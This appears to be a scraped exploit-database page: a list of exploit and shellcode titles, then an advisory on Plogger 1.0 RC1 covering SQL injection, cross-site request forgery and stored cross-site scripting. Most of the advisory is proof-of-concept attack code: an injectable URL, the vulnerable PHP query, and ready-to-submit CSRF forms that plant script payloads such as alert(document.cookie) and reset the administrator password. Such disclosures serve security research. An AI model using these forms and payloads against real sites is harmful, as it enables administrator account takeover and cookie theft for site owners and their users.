
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
139 lines
No EOL
6.4 KiB
Text
139 lines
No EOL
6.4 KiB
Text
source: https://www.securityfocus.com/bid/58271/info
|
|
|
|
Plogger is prone to following input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data:
|
|
|
|
1. An SQL-injection vulnerability
|
|
2. Multiple cross-site scripting vulnerabilities
|
|
3. A cross-site request forgery vulnerability
|
|
|
|
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in context of the affected site, steal cookie-based authentication credentials, access or modify data, exploit latent vulnerabilities in the underlying database, and perform certain unauthorized actions; other attacks are also possible.
|
|
|
|
Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.
|
|
|
|
+---+[ Feedback.php Sqli ]+---+
|
|
|
|
Injectable On entries_per_pag Parameter In Feedback.php
|
|
|
|
http://www.example.com/plogger/plog-admin/plog-feedback.php?entries_per_page=5'
|
|
|
|
p0c
|
|
|
|
if (isset($_REQUEST['entries_per_page'])) {
|
|
$_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
|
|
} else if (!isset($_SESSION['entries_per_page'])) {
|
|
$_SESSION['entries_per_page'] = 20;
|
|
}
|
|
.
|
|
.
|
|
.
|
|
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
|
|
.
|
|
.
|
|
|
|
// Generate javascript init function for ajax editing
|
|
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
|
|
$result = run_query($query);
|
|
|
|
+---+[ CSRF In Admin Panel ]+---+
|
|
|
|
Plogger is Not using any parameter or security Token to Protect Against CSRF , So its Vuln To CSRF on ALl Locations Inside Admin Panel..
|
|
|
|
+---+[ XSS ]+---+
|
|
|
|
Their Are Multiple XSS in Plogger.Like Editing Comment inside Admin Panel.They Are Filtering The Comments For Normal User But Not For Admin.
|
|
And AS it is CSRF All Where SO We Can Edit AN Comment VIA CSRF and Change it With Any XSS Vector..
|
|
|
|
XSS
|
|
http://www.example.com/plogger/plog-admin/plog-feedback.php
|
|
Edit Comment With ANy XSS Vector OR JUSt do it VIA CSRF.
|
|
|
|
|
|
Uploading the File and enter name to any XSS Vector..
|
|
|
|
http://www.example.com/plogger/plog-admin/plog-upload.php
|
|
|
|
It Can Me Exploit IN Many Ways LIke
|
|
CSRF + SQLI inside Admin panel..which Is define above.
|
|
|
|
XSS In Edit Comment.CSRF + XSS
|
|
|
|
<html>
|
|
<head>
|
|
<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-feedback.php" method="post">
|
|
<div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
|
|
<div>
|
|
<div class="strong">Edit Comment</div>
|
|
<p>
|
|
<label class="strong" accesskey="a" for="author">Author:</label><br />
|
|
<input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
|
|
</p>
|
|
<p>
|
|
<label class="strong" accesskey="e" for="email">Email:</label><br />
|
|
<input size="65" name="email" id="email" value="asdf@www.example.com.com" type="hidden"/>
|
|
</p>
|
|
<p>
|
|
<label class="strong" accesskey="u" for="url">Website:</label><br />
|
|
<input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
|
|
</p>
|
|
<p>
|
|
<label class="strong" accesskey="c" for="comment">Comment:</label><br />
|
|
<textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
|
|
</p>
|
|
<input type="hidden" name="pid" value="4" />
|
|
<input type="hidden" name="action" value="update-comment" />
|
|
<input class="submit" name="update" value="Update" type="submit" />
|
|
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
|
|
</div>
|
|
</form>
|
|
|
|
|
|
Another XSS
|
|
http://www.example.com/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
|
|
Edit Caption To XSS Vector Inside Admin PAnel..
|
|
Again CSRF + XSS
|
|
<form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
|
|
<div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
|
|
<div>
|
|
<div class="strong">Edit Image Properties</div>
|
|
<p>
|
|
<label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
|
|
<input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
|
|
</p>
|
|
<p>
|
|
<label class="strong" for="description">Description:</label><br />
|
|
<textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
|
|
</p>
|
|
<p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
|
|
<input type="hidden" name="pid" value="1" />
|
|
<input type="hidden" name="action" value="update-picture" />
|
|
<input class="submit" name="update" value="Update" type="submit" />
|
|
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
|
|
</div>
|
|
</form>
|
|
|
|
|
|
CSRF Admin Password Reset And XSS
|
|
|
|
plog-options.php
|
|
|
|
<form action="http://www.example.com/plogger/plog-admin/plog-options.php" method="post">
|
|
<table class="option-table" cellspacing="0">
|
|
<tbody><tr class="alt">
|
|
<td class="left"><label for="admin_username"></label></td>
|
|
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
|
|
</tr>
|
|
<tr>
|
|
<td class="left"><label for="admin_email"></label></td>
|
|
<td class="right"><input size="40" id="admin_email" name="admin_email" value="www.example.com@hotmail.com" type="hidden"></td>
|
|
</tr>
|
|
<tr class="alt">
|
|
<td class="left"><label for="admin_password"></label></td>
|
|
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
|
|
<tr>
|
|
<td class="left"><label for="confirm_admin_password"></label></td>
|
|
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
|
|
</tr>
|
|
<td class="left"><label for="gallery_url"></label></td>
|
|
<td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
|
|
</tbody></table>
|
|
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td> |